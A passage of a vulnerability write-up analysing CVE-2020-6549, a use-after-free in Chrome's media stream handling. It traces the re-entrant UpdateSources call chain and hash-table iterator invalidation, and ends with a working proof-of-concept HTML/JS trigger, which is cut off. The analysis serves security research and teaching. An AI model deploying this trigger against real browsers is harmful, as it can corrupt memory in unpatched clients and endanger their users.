class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebPlatformMediaStreamSource::StopSource</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DoStopSource</span>();</span><br><span class="line">  <span class="comment">// 主要关注</span></span><br><span class="line">  <span class="built_in">FinalizeStopSource</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在<code>FinalizeStopSource()</code>中，函数会对当前的<code>WebPlatformMediaStreamSource</code>类实例的Owner（即一个<code>WebMediaStreamSource</code>类实例）执行<code>SetReadyState()</code>函数，以设置其状态</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebPlatformMediaStreamSource::FinalizeStopSource</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!stop_callback_.<span class="built_in">is_null</span>())</span><br><span class="line">    std::<span class="built_in">move</span>(stop_callback_).<span class="built_in">Run</span>(<span class="built_in">Owner</span>());</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">Owner</span>())</span><br><span class="line">    <span class="built_in">Owner</span>().<span class="built_in">SetReadyState</span>(WebMediaStreamSource::kReadyStateEnded);</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>而这里所执行的<code>SetReadyState()</code>实际上只是一个Wrapper，它的内部会继续调用<code>MediaStreamSource::SetReadyState()</code>函数。</p><blockquote><p>这里的<code>private_</code>指针是<code>MediaStreamSource</code>类型的。<code>WebMediaStreamSource</code>内部拥有一个指向<code>MediaStreamSource</code>类的指针。</p><p>此时这里出现了<code>WebPlatformMediaStreamSource</code>、<code>MediaStreamSource</code>以及<code>WebMediaStreamSource</code>这三种MediaStreamSource，他们之间的关系不需要细究，这里只需了解其中的函数调用链即可。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">WebMediaStreamSource::SetReadyState</span><span class="params">(ReadyState state)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">DCHECK</span>(!private_.<span class="built_in">IsNull</span>());</span><br><span class="line">  private_-&gt;<span class="built_in">SetReadyState</span>(<span class="built_in">static_cast</span>&lt;MediaStreamSource::ReadyState&gt;(state));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>在<code>MediaStreamSource::SetReadyState</code>函数中，函数内部会继续调用<code>observer-&gt;SourceChangedState()</code>。<code>Observer</code>类是一个虚基类，不过我们可以通过交叉引用，来确认在该函数中，<code>Observer</code>是一个<code>MediaStreamTrack</code>类型。即该函数最终调用的是<code>MediaStreamTrack::SourceChangedState()</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaStreamSource::SetReadyState</span><span class="params">(ReadyState ready_state)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">SendLogMessage</span>(String::<span class="built_in">Format</span>(<span class="string">&quot;SetReadyState(&#123;id=%s&#125;, &#123;ready_state=%s&#125;)&quot;</span>,</span><br><span class="line">                                <span class="built_in">Id</span>().<span class="built_in">Utf8</span>().<span class="built_in">c_str</span>(),</span><br><span class="line">                                <span class="built_in">ReadyStateToString</span>(ready_state))</span><br><span class="line">                     .<span class="built_in">Utf8</span>());</span><br><span class="line">    <span class="comment">// ....</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Observers may dispatch events which create and add new Observers;</span></span><br><span class="line">    <span class="comment">// take a snapshot so as to safely iterate.</span></span><br><span class="line">    HeapVector&lt;Member&lt;Observer&gt;&gt; observers;</span><br><span class="line">    <span class="built_in">CopyToVector</span>(observers_, observers);</span><br><span class="line">    <span class="comment">// 在此处调用了</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> observer : observers)</span><br><span class="line">      observer-&gt;<span class="built_in">SourceChangedState</span>();</span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line">  &#125;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>MediaStreamTrack::SourceChangedState()</code> is the <strong>centerpiece</strong>. Its source code is listed first, followed by the explanation.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaStreamTrack::SourceChangedState</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">Ended</span>())</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Note that both &#x27;live&#x27; and &#x27;muted&#x27; correspond to a &#x27;live&#x27; ready state in the</span></span><br><span class="line">  <span class="comment">// web API, hence the following logic around 
|feature_handle_for_scheduler_|.</span></span><br><span class="line"></span><br><span class="line">  ready_state_ = component_-&gt;<span class="built_in">Source</span>()-&gt;<span class="built_in">GetReadyState</span>();</span><br><span class="line">  <span class="keyword">switch</span> (ready_state_) &#123;</span><br><span class="line">    <span class="keyword">case</span> MediaStreamSource::kReadyStateLive:</span><br><span class="line">      component_-&gt;<span class="built_in">SetMuted</span>(<span class="literal">false</span>);</span><br><span class="line">      <span class="comment">// dispatch the unmute event</span></span><br><span class="line">      <span class="built_in">DispatchEvent</span>(*Event::<span class="built_in">Create</span>(event_type_names::kUnmute));</span><br><span class="line">      <span class="built_in">EnsureFeatureHandleForScheduler</span>();</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">case</span> MediaStreamSource::kReadyStateMuted:</span><br><span class="line">      component_-&gt;<span class="built_in">SetMuted</span>(<span class="literal">true</span>);</span><br><span class="line">      <span class="comment">// dispatch the mute event</span></span><br><span class="line">      <span class="built_in">DispatchEvent</span>(*Event::<span class="built_in">Create</span>(event_type_names::kMute));</span><br><span class="line">      <span class="built_in">EnsureFeatureHandleForScheduler</span>();</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">    <span class="comment">// this is the case we care about</span></span><br><span class="line">    <span class="keyword">case</span> MediaStreamSource::kReadyStateEnded:</span><br><span class="line">      <span class="comment">// dispatch the ended event</span></span><br><span class="line">      <span class="built_in">DispatchEvent</span>(*Event::<span class="built_in">Create</span>(event_type_names::kEnded));</span><br><span 
class="line">      <span class="built_in">PropagateTrackEnded</span>();</span><br><span class="line">      feature_handle_for_scheduler_.<span class="built_in">reset</span>();</span><br><span class="line">      <span class="keyword">break</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">SendLogMessage</span>(</span><br><span class="line">      base::<span class="built_in">StringPrintf</span>(<span class="string">&quot;SourceChangedState([id=%s] &#123;readyState=%s&#125;)&quot;</span>,</span><br><span class="line">                       <span class="built_in">id</span>().<span class="built_in">Utf8</span>().<span class="built_in">c_str</span>(), <span class="built_in">readyState</span>().<span class="built_in">Utf8</span>().<span class="built_in">c_str</span>()));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This function calls <code>DispatchEvent</code>, and each switch branch dispatches a different event: <code>mute</code>, <code>unmute</code>, or <code>ended</code>. Correspondingly, JS has an event handler for each of these three events:</p><blockquote><p>The following JS material is excerpted from <a href="https://developer.mozilla.org/zh-CN/docs/Web/API/MediaStreamTrack">MediaStreamTrack - MDN</a></p></blockquote><blockquote><h4 
id="事件处理">Event handlers</h4><ul><li><p><code>MediaStreamTrack.onmute</code></p><p>The <code>EventHandler</code> called when the <code>mute</code> event is fired on this object, meaning the stream has been interrupted.</p></li><li><p><code>MediaStreamTrack.onunmute</code></p><p>The <code>EventHandler</code> called when the <code>unmute</code> event is fired on this object. Not implemented.</p></li><li><p><code>MediaStreamTrack.onended</code></p><p>The <code>EventHandler</code> called when the <code>ended</code> event is fired on this object. Not implemented.</p></li></ul></blockquote><p>In other words, if we register such an event handler from JS, the corresponding JS handler runs when the event is dispatched.</p><blockquote><p>Note that once <code>DispatchEvent</code> is called in <code>MediaStreamTrack::SourceChangedState()</code>, the renderer process's control flow stays <strong>inside</strong> that <code>DispatchEvent</code> call for as long as <strong>the JS code in the corresponding event handler is running</strong>. In other words, only after the JS event handler finishes does the renderer return from that <code>DispatchEvent</code> call and unwind up the call stack step by step.</p></blockquote><p>This is the key to the vulnerability. With a specially crafted event handler, we can try to call <code>UpdateSources</code> a second time while the first call is still in progress. The call chain can then look like this:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">    UpdateSources</span><br><span class="line">      ...</span><br><span class="line">        DispatchEvent</span><br><span class="line">          ...</span><br><span class="line">            V8</span><br><span class="line">              ...</span><br><span class="line">                UpdateSources</span><br></pre></td></tr></table></figure><p>The V8 that shows up in the chain above is the engine that executes JS code. While still inside <code>DispatchEvent</code>, the renderer uses V8 to run the JS code in the event handler, which in turn calls the renderer-internal function <code>UpdateSources</code>.</p></li><li><p>With the basic call path in place, the remaining question is <strong>which event's handler to craft</strong>. The <code>ended</code> event is the recommended choice because it is the easiest to trigger; for example, <strong>a cross-origin operation triggers the ended event</strong>.</p></li></ul><h4 id="3-调用UpdateSources函数">3. 
Calling the UpdateSources function</h4><ul><li><p>Before going through this part, read the call chain that triggers the vulnerability once more.</p><blockquote><p>While reading, <strong>pay attention to the class each function belongs to</strong>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">MediaElementEventListener::UpdateSources</span><br><span class="line">  DidStopMediaStreamSource</span><br><span class="line">    WebPlatformMediaStreamSource::StopSource</span><br><span class="line">      WebPlatformMediaStreamSource::FinalizeStopSource</span><br><span class="line">        WebMediaStreamSource::SetReadyState</span><br><span class="line">          MediaStreamSource::SetReadyState</span><br><span class="line">            MediaStreamTrack::SourceChangedState</span><br><span class="line">              EventTarget::DispatchEvent</span><br></pre></td></tr></table></figure></li><li><p>We can now try to reach DispatchEvent through a MediaStreamTrack object, but the question remains: how do we invoke the top-level <code>UpdateSources</code>?</p></li><li><p>Note that <code>UpdateSources</code> belongs to the class <code>MediaElementEventListener</code>. Searching <a href="https://developer.mozilla.org/zh-CN/docs/Web/API">API - MDN</a> for <code>MediaElement</code> does indeed <strong>turn up the <code>HTMLMediaElement</code> object</strong> in the JS API - <a href="https://developer.mozilla.org/zh-CN/docs/Web/API/HTMLMediaElement">HTMLMediaElement - MDN</a></p></li><li><p>Following the call chain, <code>UpdateSources</code> eventually calls <code>WebPlatformMediaStreamSource::StopSource</code> deep down, so we search the <code>HTMLMediaElement</code> API documentation for strings related to <code>WebPlatformMediaStreamSource</code> and eventually find <strong>the JS object <code>MediaStream</code></strong> 
.</p><blockquote><p>While reading the <code>HTMLMediaElement</code> API, we also come across the property <code>HTMLMediaElement.crossOrigin</code>. Its existence indirectly supports the idea that changing the <code>src</code> property of an <code>HTMLMediaElement</code> can <strong>trigger a cross-origin event</strong>.</p></blockquote></li><li><p>The <code>HTMLMediaElement</code> JS API exposes several APIs related to this object, but only <code>HTMLMediaElement.captureStream()</code> matters here: <strong>it returns the <code>MediaStream</code> of the current <code>HTMLMediaElement</code></strong>. This way, <strong>we can link the <code>HTMLMediaElement</code> object to the <code>MediaStream</code> object.</strong></p></li><li><p>The <strong><code>MediaStream</code></strong> interface represents a stream of media content. A stream contains several <em>tracks</em>, such as video and audio tracks. <a href="https://developer.mozilla.org/zh-CN/docs/Web/API/MediaStream">MediaStream - MDN</a>. The <code>MediaStream</code> interface has several event handlers and methods. Only two are covered here:</p><ul><li>The first is the <code>MediaStream.onaddtrack</code> event handler, which fires after a <code>MediaStreamTrack</code> is added to the stream. We can use this event to make sure the cross-origin operation runs only after the <code>MediaStreamTrack</code> has been loaded, which avoids unexpected problems.</li><li>The second is the <code>MediaStream.getTracks</code> method, which returns the <code>MediaStreamTrack</code> objects inside the <code>MediaStream</code> object.</li></ul><p>This chains together <code>HTMLMediaElement - MediaStream - MediaStreamTrack</code>.</p></li><li><p>One last problem: we trigger the UAF step by step through an <code>HTMLMediaElement</code> JS object, but when actually writing the POC we cannot construct an <code>HTMLMediaElement</code> object directly from JS. According to MDN, we can construct an <code>HTMLAudioElement</code> object instead. It is a JS object derived from <code>HTMLMediaElement</code>, and <strong>its constructor is <code>Audio()</code></strong>.</p></li><li><p>So the <strong>basic test code</strong> we end up with is as follows:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="variable constant_">AUDIO_URL</span> = <span class="string">&#x27;http://localhost:8000/audio.mp3&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">audio = <span class="keyword">new</span> <span class="title class_">Audio</span>(<span class="variable constant_">AUDIO_URL</span>);</span></span><br><span class="line"><span class="language-javascript">stream = audio.<span class="title function_">captureStream</span>();</span></span><br><span class="line"><span class="language-javascript">stream.<span class="property">onaddtrack</span> = <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">  track = stream.<span class="title function_">getAudioTracks</span>()[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// Set the onended event handler of the MediaStreamTrack</span></span></span><br><span class="line"><span class="language-javascript">  track.<span class="property">onended</span> = <span class="keyword">function</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="comment">// Here we should try to call UpdateSources again inside the renderer</span></span></span><br><span class="line"><span class="language-javascript">  &#125;</span></span><br><span class="line"><span class="language-javascript">  <span class="comment">// Change audio's src to a cross-origin URL so that the renderer runs UpdateSources</span></span></span><br><span class="line"><span class="language-javascript">  audio.<span class="property">src</span> = <span class="variable 
constant_">AUDIO_URL</span>.<span class="title function_">replace</span>(<span class="string">&#x27;localhost&#x27;</span>, <span class="string">&#x27;127.0.0.1&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">&#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure></li></ul><h4 id="4-再次调用UpdateSources">4. Calling UpdateSources again</h4><p>From the analysis above, we can get JS code (the code in the JS event handler) to run while execution is still inside <code>UpdateSources</code>. So how do we call <code>UpdateSources</code> again from that JS code?</p><p>Breaking during the cross-origin operation and printing the stack frames reveals a notable function: <code>MediaElementEventListener::Invoke</code></p><p><img src="/2020/10/CVE-2020-6549/switchSrc.png" alt="img"></p><p>Its source code, with the irrelevant parts trimmed, is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::Invoke</span><span class="params">(ExecutionContext* context,</span></span></span><br><span class="line"><span class="params"><span class="function">                                       Event* event)</span> </span>&#123;</span><br><span class="line">  <span 
class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (event-&gt;<span class="built_in">type</span>() == event_type_names::kEnded) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (event-&gt;<span class="built_in">type</span>() != event_type_names::kLoadedmetadata)</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// If |media_element_| is a MediaStream, clone the new tracks.</span></span><br><span class="line">  <span class="keyword">if</span> (media_element_-&gt;<span class="built_in">GetLoadType</span>() == WebMediaPlayer::kLoadTypeMediaStream) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="built_in">UpdateSources</span>(context);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line">  <span class="built_in">UpdateSources</span>(context);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>It is easy to see that <code>Invoke</code> is where dispatched events get handled. When JS calls <code>dispatchEvent</code> on an object to dispatch an event, the renderer eventually reaches this function.</p><p>Here we only need to get past two checks to reach <code>UpdateSources</code>; that is, the incoming <code>event-&gt;type()</code> must be <code>event_type_names::kLoadedmetadata</code>. Cross-references show that the string corresponding to this type is <code>loadedmetadata</code>.</p><p>So the following statement calls <code>UpdateSources</code>.</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span 
class="line">audio.<span class="title function_">dispatchEvent</span>(<span class="keyword">new</span> <span class="title class_">Event</span>(<span class="string">&#x27;loadedmetadata&#x27;</span>));</span><br></pre></td></tr></table></figure><h4 id="5-迭代器失效">5. Iterator invalidation</h4><ul><li><p>We can now <strong>insert elements</strong> into the <code>sources_</code> set through the inner <code>UpdateSources</code> call.</p><p>But how do we <strong>invalidate the iterator</strong> that the outermost <code>UpdateSources</code> will use next? This depends on the structure of the <code>sources_</code> set.</p><p>Since data structures in Chrome are usually built on top of a few basic structures, we can follow the cross-references from <code>sources_.insert</code> to find which underlying data structure actually implements the insert used by <code>sources_</code>.</p><p>In the end we find that <strong>the insert actually called belongs to HashTable</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">MediaElementEventListener::UpdateSources</span><span class="params">(ExecutionContext* context)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">for</span> (<span class="keyword">auto</span> track : media_stream_-&gt;<span class="built_in">getTracks</span>())</span><br><span class="line">    <span class="comment">// 
click through this insert</span></span><br><span class="line">    sources_.<span class="built_in">insert</span>(track-&gt;<span class="built_in">Component</span>()-&gt;<span class="built_in">Source</span>());</span><br><span class="line"><span class="comment">// ...</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> T, <span class="keyword">typename</span> U, <span class="keyword">typename</span> V, <span class="keyword">typename</span> W&gt;</span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> IncomingValueType&gt;</span><br><span class="line"><span class="keyword">inline</span> <span class="keyword">typename</span> HashSet&lt;T, U, V, W&gt;::AddResult HashSet&lt;T, U, V, W&gt;::<span class="built_in">insert</span>(</span><br><span class="line">    IncomingValueType&amp;&amp; value) &#123;</span><br><span class="line">    <span class="comment">// click through this insert</span></span><br><span class="line">  <span class="keyword">return</span> impl_.<span class="built_in">insert</span>(std::forward&lt;IncomingValueType&gt;(value));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">template</span> &lt;<span class="keyword">typename</span> IncomingValueType&gt;</span><br><span class="line"><span class="function">AddResult <span class="title">insert</span><span class="params">(IncomingValueType&amp;&amp; value)</span> </span>&#123;</span><br><span class="line">      <span class="comment">// click through this insert</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">insert</span>&lt;IdentityTranslatorType&gt;(</span><br><span class="line">      Extractor::<span class="built_in">Extract</span>(value), std::forward&lt;IncomingValueType&gt;(value));</span><br><span class="line">&#125;</span><br><span 
class="comment">// Finally, the insert in use turns out to be HashTable's</span></span><br><span class="line">HashTable&lt;Key, Value, Extractor, HashFunctions, Traits, KeyTraits, Allocator&gt;::</span><br><span class="line">    <span class="built_in">insert</span>(T&amp;&amp; key, Extra&amp;&amp; extra) &#123; <span class="comment">/* ... */</span>  &#125;</span><br></pre></td></tr></table></figure></li><li><p>Part of the source of <code>HashTable::insert</code> is given here; only a portion of it matters to us.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* ... */</span></span><br><span class="line"><span class="keyword">typename</span> HashTable&lt; <span class="comment">/* ... 
*/</span> &gt;::AddResult</span><br><span class="line">HashTable&lt;Key, Value, Extractor, HashFunctions, Traits, KeyTraits, Allocator&gt;::</span><br><span class="line">    <span class="built_in">insert</span>(T&amp;&amp; key, Extra&amp;&amp; extra) &#123;</span><br><span class="line">  <span class="comment">// ....</span></span><br><span class="line"></span><br><span class="line">  ++key_count_;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">ShouldExpand</span>()) &#123;</span><br><span class="line">    entry = <span class="built_in">Expand</span>(entry);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (WTF::IsWeak&lt;ValueType&gt;::value &amp;&amp; <span class="built_in">ShouldShrink</span>()) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>During insertion, when the hash table runs out of space and has to expand, the program allocates a new block of memory and <strong>the original block is freed</strong>. Once the original block is freed, <strong>any pointer-based iterator into the old hash table becomes invalid!</strong></p><p>This lets us invalidate the hash table iterator used by the outer <code>UpdateSources</code> and thereby trigger the UAF.</p><blockquote><p>A note on the HashTable structure in Chrome: unlike the hash table in SGI STL, it does not appear to chain entries in buckets; it is simply a one-dimensional array indexed by hash value.</p><p>As a result, incrementing its iterator is just a simple pointer move.</p></blockquote><p>So inside the JS <code>onended</code> event handler, we need to run the following JS code:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Call UpdateSources repeatedly to insert many elements, eventually expanding the table's memory and invalidating the original iterator</span></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">1000</span>; ++i)</span><br><span class="line">    
audio.<span class="title function_">dispatchEvent</span>(<span class="keyword">new</span> <span class="title class_">Event</span>(<span class="string">&#x27;loadedmetadata&#x27;</span>));</span><br></pre></td></tr></table></figure></li></ul><h4 id="6、POC">6. POC</h4><blockquote><p>Combining the JS snippets above gives the POC below.</p></blockquote><blockquote><p>Note: when debugging the POC, <strong>you must run a local web server</strong> instead of loading the HTML directly over the file protocol.</p></blockquote><ul><li><p><strong>audio.mp3</strong></p><p>The audio file must be one that actually plays, not an arbitrary file renamed to <code>audio.mp3</code>. Otherwise <code>stream.getAudioTracks()</code> in the JS code returns an empty list.</p></li><li><p><strong>poc.html</strong></p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// Execution flow: poc() -&gt; stream.onaddtrack() -&gt; 
track.onended()</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">poc</span>(<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable constant_">AUDIO_URL</span> = <span class="string">&#x27;http://localhost:8000/audio.mp3&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">        audio = <span class="keyword">new</span> <span class="title class_">Audio</span>(<span class="variable constant_">AUDIO_URL</span>);</span></span><br><span class="line"><span class="language-javascript">        stream = audio.<span class="title function_">captureStream</span>();</span></span><br><span class="line"><span class="language-javascript">        stream.<span class="property">onaddtrack</span> = <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] execute stream.onaddtrack&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            track = stream.<span class="title function_">getAudioTracks</span>()[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">            track.<span class="property">onended</span> = <span class="keyword">function</span> (<span class="params"></span>) &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">1000</span>; ++i)&#123;</span></span><br><span class="line"><span class="language-javascript">                    <span class="variable language_">console</span>.<span class="title 
function_">log</span>(<span class="string">&quot;[+] try dispatchEvent&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                    audio.<span class="title function_">dispatchEvent</span>(<span class="keyword">new</span> <span class="title class_">Event</span>(<span class="string">&#x27;loadedmetadata&#x27;</span>));</span></span><br><span class="line"><span class="language-javascript">                &#125;</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] try load different URL&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            audio.<span class="property">src</span> = <span class="variable constant_">AUDIO_URL</span>.<span class="title function_">replace</span>(<span class="string">&#x27;localhost&#x27;</span>, <span class="string">&#x27;127.0.0.1&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// The current JS code finishes first, then track.onended runs</span></span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// The current JS code finishes first, then stream.onaddtrack runs</span></span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] try to enter stream.onaddtrack&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="title function_">poc</span>();</span></span><br><span class="line"><span 
